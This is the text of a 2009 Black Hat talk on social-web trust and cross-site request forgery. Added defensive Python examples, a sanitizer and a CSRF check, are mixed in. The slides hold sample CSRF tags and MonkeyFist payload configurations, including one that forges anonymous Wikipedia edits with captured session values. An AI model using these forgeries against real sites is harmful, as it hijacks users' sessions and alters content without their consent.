Nathan Hamiel 

Senior Consultant - Idea InfoSec 

Associate Prof @UAT, Hexagon Security Group 

23rd Degree Mason, LavaRolling Enthusiast 



Shawn Moyer 

Principal Consultant - FishNet Security 
Douchebag with microphone, self-styled Wikipedian 

Shot a man in Reno just to watch him die 
* Navel gazing and rants 

* Democratization of misinformation 

* Trust, integration, and shared exposure 

* Features arms race, emerging attack surface 

* Actual information and content 

* A nifty (we think) approach to an old bug 

* Tool release, ensuing demos of fail 

* Stupid API tricks and multi-site mayhem 

* Sorry, you have to listen to rants first. =) 
* User-Generated Content 

* User-driven, social, collaborative content 

* Blogs, wikis, socnets, web communities 

* Increasingly bolted onto "old" web media 

* Integrated, Aggregated, Dynamic 

* Offsite content, syndication, shared APIs 

* Aggregation points, feeds, personal portals 

* Increasing client-side logic (REST, JSON, etc) 
* Moot is Time's person of the year 

* Lulzy example. Larger problem. 

* Time: "Fen. Internet polls aren't trusted." Oh 
* Post-MJ celebrity death hoaxes 

* Some "real" news outlets picked up. 

* i Report, u Report, you are on notice. 

* Note: Please stop Rickrolling. Please. 



[Screenshot: thestar.com News page showing the hoax article "1980s pop icon Rick Astley, 43, found dead in Berlin hotel room": "BERLIN: Known for his 1980s pop hit Never Gonna Give You Up, 43-year-old Rick Astley has been pronounced dead Tuesday. His body was found at the Angleterre Hotel in Berlin after an ambulance responded to an emergency call from his hotel room."] 
* NYT aggregation fail 

* HTML injection article propagates HTML injection 

* Aggregation, syndication, shared exposure 
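The NYT case above is an aggregator re-rendering syndicated HTML as-is, so an injection in one article becomes an injection on every site that carries it. As an added example (not from the talk or any tool it describes), here is a small allowlist sanitizer for syndicated fragments built on Python's standard-library HTML parser; the tag allowlist, the `sanitize` name and the sample feed item are constructed for the illustration:

```python
"""Allowlist sanitizer for syndicated HTML fragments (constructed example)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allowlist: a few formatting tags, and only http(s) links.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
DROP_CONTENT = {"script", "style"}  # their bodies are never rendered


class AllowlistSanitizer(HTMLParser):
    """Re-serialises a fragment keeping only allowlisted tags and attributes.
    Unknown tags are dropped but their text survives (escaped); script and
    style bodies are dropped entirely; every text node is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []       # allowlisted tags currently open, for balancing
        self.skip_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # e.g. <img onerror=...> is dropped wholesale
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # event handlers and everything else land here
            if name == "href" and urlsplit(value).scheme not in ("http", "https"):
                continue  # blocks javascript:, data:, vbscript: and friends
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.stack:
            return
        while self.stack:  # close anything still open inside this element
            closed = self.stack.pop()
            self.out.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def close(self):
        super().close()
        while self.stack:  # balance tags the fragment left open
            self.out.append(f"</{self.stack.pop()}>")


def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# Constructed feed item of the kind an aggregator might re-render verbatim.
SAMPLE_ITEM = (
    '<p>Breaking: <b>story</b> <script>alert(1)</script>'
    '<img src=x onerror=alert(1)>'
    '<a href="javascript:alert(1)">link</a> '
    '<a href="http://example.com/">ok</a> 5 &lt; 6</p>'
)

if __name__ == "__main__":
    print(sanitize(SAMPLE_ITEM))
```

The design choice is an allowlist rather than a blocklist: anything the aggregator did not explicitly decide to render (unknown tags, every attribute except `href` on links, non-http(s) link schemes, script and style bodies) is discarded, and all remaining text is re-escaped on output, so the fragment can be embedded into the aggregator's own page without the original site's mistakes coming along.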



[Screenshot: McAfee "Get Your Rebate" page with the rebate submission form (Select Product Purchased, Date Purchased)] 

Black Hat USA 2009 
Saturday, August 1, 2009 

What could possibly go wrong? 

DailyKos trolls twittering dittoheads 

* Fake economy / budget numbers 

* $3 million for replacement tires for 1992-1995 Geo Metros. 

* $750,000 for an underground tunnel connecting a middle school and high school in North Carolina. 

* $4.7 million for a program supplying public television to K-8 classrooms. 

* $2.3 million for a museum dedicated to the electric bass guitar. 
The emerging socialized web 

Multi-site aggregation = Attacker ROI 
Multipoint attack surfaces, APIs, "Digg this!", etc 
(n)th-parties and shared exposure 

"Malware-like" legit functionality 

Silent updates, presence announcements 
Offsite links and wrapped external content 
Try blocking .js for googleapis.com. I dare you. 
[Screenshot: feature list of a browser-hosted services product: File Sharing ("A simple and safe way to share files directly from your computer"), Photo Sharing ("Share your personal photos with friends around the world without the need to upload them"), Fridge ("A fun place for people to leave notes on your computer"), The Lounge ("Invite your friends to a chat in The Lounge hosted on your computer"), Media Player ("Access your complete home music library from wherever you are"), Web Server ("Host your Web sites running from your own computer")] 
* Retrofitting the Thing of The Now 

* More FF fail. No, srsly. 
[Screenshot: Jabber IM chat window on a social-site service, a bot-like exchange: "Hello, how are you doing tonight?" / "im fine... and you?" / "I am not doing too bad. What are you up to tonight?" / "nothing... just chillin here at my room.."] 

Exposing Yourself 
OAuth / Yahoo! Application Platform Infrastructure 

[Diagram: Yahoo! Application Platform infrastructure (mechanisms for requesting, securing and publishing data; profile record replication)] 
Exposing Yourself 

APIs are the New Hotness 

Integrate other site functions (Your tweets in my Facebook? Awww....) 

Hooks into fluffy clouds of amorphous love 

googleapis, amazonws, others 

Crossdomain content, sandboxing 

Two major types of APIs 

For consumption of application services 
For integration of app on another site 
* Your app is so ugly its APIs have APIs 

* How far away from what we are using do we need to be? 

[Diagram: Application -> API -> Application -> Application = WTF] 

* Complexity breeds exposure. 
API as anon proxy 

Attack anonymization via shared APIs 

[Diagram: Attacker -> shared API -> Site/Application] 
Place Like 127.0.0.1 

Hi5 API localhost dev page. Oops!!! 

[Screenshot: Hi5 API localhost dev page listing the SOAP API namespace] 
Triangle of Death 

(Rectangle | Pentagon | Hexagram | Octagon) of Death 
CSRF / Session Riding / XSRF 

Well understood. Pete Watkins, 2001 
Often tough to audit for, nuanced 
Typically described as a "static" attack 
Per-user forgeries usually only via XSS 



Can be silly, bad, or really, really bad 

Our continued move to webeverything (tm) 
Classical mitigations: Referrer, POSTs, tokens 
You use a browser for it? 

[Diagram: CSRF attacks reach localhost, local network systems and devices, and web sites and applications] 
Classical CSRF 

[Diagram: the browser holds a session (cookies) to good.com; content on bad.com issues a GET or POST with the location of good.com, and the browser sends it along with good.com's cookies] 

Example: 

<img src="http://good.com/poll.php?poll=5&selection=2" height="1" width="1"> 
"Dynamic" CSRF 

Per-request, per-session, per-user forgeries 
Watkins described in 2001, but no one noticed 
Samy, recent bit.ly XSS, other XSS worms 
Again, well understood as XSS side effect 

Lots of "complex" CSRF gets ignored 

POST-based, tokenized, per-user requests 

Still exploitable, but higher bar 

<img src="/password?newpassword=moo"> gets old after the 30 times or so. 
"Dynamic" CSRF 

We wanted to automate "complex" CSRF 
Needed more logic than just redirects / tags 
Many non-trivial CSRF are ignored 

Devs often think SOP saves them (it might) 

See also: http://securethoughts.com/2009/07/hacking-csrf-tokens-using-css-history-hack/ 
3-Way Site Communication 

1. Initial Request 

2. Redirect to bad.com 

3. Custom payload for site 

[Diagram: the browser's request to kindagood.com is redirected to bad.com, the redirected request carrying the referer, CSRF tokens, session IDs, etc.; bad.com answers with a custom payload for sortagood.com built from those tokens and session IDs] 
Enter the Fist 

MonkeyFist: PoC Dynamic CSRF Tool 

http://hexsec.com/labs 

Small Python web server 

Creates payload / patterns based on referrer 

Automates per-request, "dynamic" CSRF 

Constructs hidden POSTs, redirects, refreshes 

Makes requests for tokens or steals from referrer 
MF Payload Options 

<PAYLOAD n="1"> - Payload with number 
<SITE l="example.com"> - Site entry w/ domain 
<METHOD> - Attack method (GET, POST, PAGE) 
<ID> - Session data to grab 
<TARGET> - URL to send attack to 
<HEADER> - Header to add to POST request 
<HEADVAL> - Value for defined header 
<POSTVAR> - POST variable name 
<POSTVAL> - Value for defined POST variable 
<DESTINATION> - Destination for meta refresh 
<PAYLOAD n="1">
  <SITE l="example1.com">
    <METHOD>GET</METHOD>
    <ID>rand=</ID>
    <ID>sess=</ID>
    <TARGET>http://example1.com/update.php?rand=&amp;sess=&amp;message=hello</TARGET>
  </SITE>
</PAYLOAD>
<PAYLOAD n="2">
  <SITE l="www.example2.com">
    <METHOD>POST</METHOD>
    <ID>rand=</ID>
    <ID>sess=</ID>
    <TARGET>http://www.example1.com/update.php</TARGET>
    <HEADER>User-Agent</HEADER>
    <HEADVAL>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)</HEADVAL>
    <HEADER>Cookie</HEADER>
    <HEADVAL>sess</HEADVAL>
    <POSTVAR>foo</POSTVAR>
    <POSTVAL>bar</POSTVAL>
    <POSTVAR>morefoo</POSTVAR>
    <POSTVAL>morebar</POSTVAL>
    <POSTVAR>rand</POSTVAR>
    <POSTVAL>rand</POSTVAL>
  </SITE>
</PAYLOAD>
[Diagram: Host w/ Redirect -> Redirect w/ Session Data] 

[Diagram: Host Making POST -> POST Construct] 

[Diagram: Host w/ Page -> Legitimate Link Destination / Unintended Request Destination] 

[Screenshot: Wikipedia article "Cross-site request forgery", section "Example and characteristics"] 
What You Just Saw 

* MF "Dynamic" CSRF of anon Wikipedia edit 

* Requests were replayable, but unique 

* wpEdittime, wpStarttime, other session values 

* MF requested session values, hidden POST 

* We think this is pretty nifty. 
<PAYLOAD n="5">
  <SITE l="stlouis.craigslist.org">
    <METHOD>FIXATION</METHOD>
    <TARGET>http://en.wikipedia.org/w/index.php?title=Cross-site_request_forgery&amp;action=submit</TARGET>
    <DESTINATION>http://www.youtube.com/watch?v=ZAlNoQQaaNw</DESTINATION>
    <IDSRC>http://en.wikipedia.org/w/index.php?title=Cross-site_request_forgery&amp;action=edit</IDSRC>
    <FIXVAR>wpStarttime</FIXVAR>
    <FIXVAL>wpStarttime</FIXVAL>
    <FIXVAR>wpEdittime</FIXVAR>
    <FIXVAL>wpEdittime</FIXVAL>
    <FIXVAR>wpAutoSummary</FIXVAR>
    <FIXVAL>wpAutoSummary</FIXVAL>
    <POSTVAR>wpAntispam</POSTVAR>
    <POSTVAL></POSTVAL>
    <POSTVAR>wpSection</POSTVAR>
    <POSTVAL>4</POSTVAL>
    <POSTVAR>wpScrolltop</POSTVAR>
    <POSTVAL>0</POSTVAL>
    <POSTVAR>wpSummary</POSTVAR>
    <POSTVAL></POSTVAL>
    <POSTVAR>wpSave</POSTVAR>
    <POSTVAL>Save+page</POSTVAL>
    <POSTVAR>wpEditToken</POSTVAR>
    <POSTVAL>+\</POSTVAL>
  </SITE>
</PAYLOAD>
* CSRF mitigations are well understood 

* Still, you have to do LOTS of things right 

* No bolt-on fixes, sorry. 

* Look at your code! Forget SOP. 

* Thanks for listening. Send bugfixes. 
Nathan's blog: http://www.neohaxor.org 
Shawn hates blogs. 
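The closing point, that the mitigations are known but only work when done together, as an added example that is not part of the talk or of MonkeyFist: a server-side CSRF check in Python that combines the classical mitigations from the CSRF slides (POST-only state changes, an Origin/Referer check, a per-session token compared in constant time) and additionally refuses a token carried in the URL, since that is exactly what the referer-based "dynamic" attack harvests. `good.com`, `bad.com`, the session ids, the server secret and the request dictionaries are constructed for the illustration.

```python
"""Server-side CSRF check exercising the classical mitigations together
(constructed example; not MonkeyFist code)."""
import hashlib
import hmac
from urllib.parse import urlsplit

SITE_HOST = "good.com"  # constructed: the site being protected
SERVER_SECRET = b"constructed-server-side-secret"  # constructed: random in deployment


def issue_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Per-session token: HMAC of the session id under a server secret, so the
    server stores nothing and a token lifted from one session is useless in
    another (the per-user property dynamic CSRF has to work around)."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def source_host(headers: dict):
    """Host the browser says the request came from (Origin, else Referer)."""
    src = headers.get("Origin") or headers.get("Referer")
    return urlsplit(src).hostname if src else None


def check_csrf(request: dict, secret: bytes = SERVER_SECRET):
    """request: {'method', 'path', 'query', 'headers', 'cookies', 'form'}.
    Returns (accepted, reason)."""
    if request["method"] != "POST":
        return False, "state change must be a POST (img/link forgeries are GETs)"
    session_id = request["cookies"].get("sess")
    if not session_id:
        return False, "no session cookie"
    host = source_host(request["headers"])
    if host is None:
        return False, "missing Origin and Referer"  # strict: reject, don't assume
    if host != SITE_HOST:
        return False, f"cross-site request from {host}"
    if "csrf_token" in request["query"]:
        return False, "token carried in the URL (would leak through Referer)"
    token = request["form"].get("csrf_token")
    if token is None:
        return False, "missing token"
    if not hmac.compare_digest(token, issue_token(session_id, secret)):
        return False, "token does not belong to this session"
    return True, "ok"


# Constructed sample traffic mirroring the slides' good.com / bad.com story.
VICTIM_SESSION = "sess-victim-1234"
OTHER_SESSION = "sess-other-9876"


def sample_requests():
    base = {"path": "/update.php", "query": {}, "cookies": {"sess": VICTIM_SESSION}}
    return {
        # Legitimate form post from good.com with the victim's own token.
        "legit": {**base, "method": "POST",
                  "headers": {"Origin": "http://good.com"},
                  "form": {"message": "hello",
                           "csrf_token": issue_token(VICTIM_SESSION)}},
        # Classical CSRF: <img src="http://good.com/poll.php?..."> on bad.com.
        "img_get": {**base, "method": "GET", "path": "/poll.php",
                    "query": {"poll": "5", "selection": "2"},
                    "headers": {"Referer": "http://bad.com/"}, "form": {}},
        # Hidden auto-submitting form served from bad.com, no token.
        "hidden_post": {**base, "method": "POST",
                        "headers": {"Origin": "http://bad.com"},
                        "form": {"message": "pwned"}},
        # Dynamic CSRF: a token issued for some other session, replayed.
        "replayed_token": {**base, "method": "POST",
                           "headers": {"Origin": "http://good.com"},
                           "form": {"message": "pwned",
                                    "csrf_token": issue_token(OTHER_SESSION)}},
        # Valid token, but also present in the query string: rejected, because
        # that URL would hand the token to any site the page links out to.
        "token_in_url": {**base, "method": "POST",
                         "query": {"csrf_token": issue_token(VICTIM_SESSION)},
                         "headers": {"Origin": "http://good.com"},
                         "form": {"message": "hello",
                                  "csrf_token": issue_token(VICTIM_SESSION)}},
    }


def run_checks():
    return {name: check_csrf(req) for name, req in sample_requests().items()}


if __name__ == "__main__":
    for name, (ok, why) in run_checks().items():
        print(f"{name:15} {'ACCEPT' if ok else 'REJECT'}  {why}")
```

Each check on its own is the kind of thing the slides say gets bypassed: a GET-only rule is beaten by a hidden POST form, a Referer check is beaten when the referer is missing or the token rides in the referer, and a token that is not bound to the session can be fixated or replayed. Layered, and with the token kept out of URLs, each sample forgery above is rejected for a different, logged reason while the legitimate post still goes through.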